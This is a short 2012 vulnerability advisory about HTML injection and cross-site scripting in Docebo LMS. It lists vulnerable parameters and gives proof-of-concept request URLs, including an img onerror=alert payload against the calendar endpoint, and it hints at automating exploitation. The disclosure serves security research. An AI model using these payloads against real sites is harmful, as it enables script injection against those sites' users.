[ TITLE ....... ][ Docebo LMS HTML Injection
[ DATE ........ ][ 15.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.docebo.com
[ VERSION ..... ][ docebo_3605.zip
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
HTML Injection.

[--------------------------------------------[
[ 3. Where is bug :)

HTTP GET 'attack' should look like this:
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10+payload

Vulnerable parameter is :
id_module_sel, 
ord, 
op_listview_idplayitem,
working_area,
(more?)


Anyway, I was able to 'attack' application only in automated way.
Directly accesing parameter id_module_sel with payload (html injection string)
is not working. Setting few attacks (for example 10) could do adding to DB/cache(?)
content (payload) and 'selecting it' with next request(with next payload).

Wierd, but works. Question for now is how to automate this to 'real exploitation 
scenarion' ;) For education of course.

Try this:
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10}%3E%3Ch1%3Etest%3Cbr%3Etest2%3C%2fh1%3E

Screens of attack You will find @ my blog. ;)

And this:
http://docebo/doceboLms/ajax.server.php?plf=lms&mn=calendar&op=set&index=0&id=%3Ch1%3E%3Cimg%20src=x%20onerror=alert%28123%29%3Eaaaaa%3C/h1%3E&_owner=1040&calEventClass=lms&private=on&start_day=15&start_month=4&start_year=2012&start_hour=09&start_min=00&start_sec=00&end_day=15&end_month=4&end_year=2012&end_hour=09&end_min=00&end_sec=00&category=a&title=aaaaaaaaaaaaaa&description=bbbbbbbbbbbbbbb

Vulnerable parameters here are: id and index.

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.docebo.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[